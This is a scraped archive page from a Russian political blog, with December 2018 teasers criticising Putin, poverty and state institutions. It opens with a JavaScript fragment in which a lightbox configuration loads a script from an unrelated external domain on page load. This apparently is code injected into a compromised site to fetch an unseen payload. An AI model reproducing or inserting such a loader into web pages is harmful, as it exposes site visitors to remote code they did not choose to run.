, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Архив за декабря, 2018

Кризис социальный возник или его создали?

30 Дек

В 2016 году на 10% самых обеспеченных россиян приходилось 46% национального дохода.

По данным Росстата, в 2016 году доходы ниже прожиточного минимума были у 19,8 млн россиян, что составляет порядка 13,5% населения.

Вице-премьер Ольга Голодец отмечала, что в России есть уникальное явление — работающие бедные.
Читать полностью »

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Мог ли при таких обстоятельствах Путин требовать широкого применения п.п. 8 п. 2 статьи 235 ГК РФ?

27 Дек

Уже седьмой год действует норма, позволяющая осуществлять конфискацию у чиновников  «сомнительной собственности», которую они не заработали бы и за сто лет « верной службы народу».

При этом не требуется устанавливать и доказывать, каким именно криминальным способом эта собственность оказалась у чиновника, устанавливать его виновность, а также тратить деньги на содержание их в местах лишения свободы. Забрали имущество и лишили права  занимать государственные должности. Это сразу отобьёт охоту использовать свои полномочия для личного обогащения.
Читать полностью »

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Какое самое трудное решение Путин не решается принять?

21 Дек

Прошедшая  пресс-конференция главы государства показала, что Путин с готовностью отвечал на все вопросы журналистов, объясняя свою позицию.

Например, несмотря на то, что  по данным «Левада-центра» 66 процентов с ностальгией отзываются о Советском Союзе, решение возродить в стране социализм, Путин не примет.
Читать полностью »

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Что происходит, когда, лица, осуществляющие государственную власть, не понимают её предназначение

17 Дек

Уголовное судопроизводство имеет своим назначением защиту прав и законных интересов потерпевших от преступлений, а также защиту личности от незаконного и необоснованного обвинения, осуждения, ограничения её прав и свобод.

Начало такой защиты возложено на Следственный комитет Российской Федерации (СК России) — федеральный государственный орган в Российской Федерации, осуществляющий полномочия в сфере уголовного судопроизводства.
Читать полностью »

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Почему юрист Владимир Путин не даёт правовой оценки происходящему в России?

15 Дек

Являясь много лет  по должности гарантом Конституции, обязанный обеспечивать волю народа, изложенную в Основном законе, Путин избегает правовой  оценки деятельности не только органов власти, но и назначаемых именно им должностных лиц осуществлять государственную власть, т.е. быть гарантом Конституции.
Читать полностью »

 
Комментариев нет

Автор: ossin Категория: Прочие заметки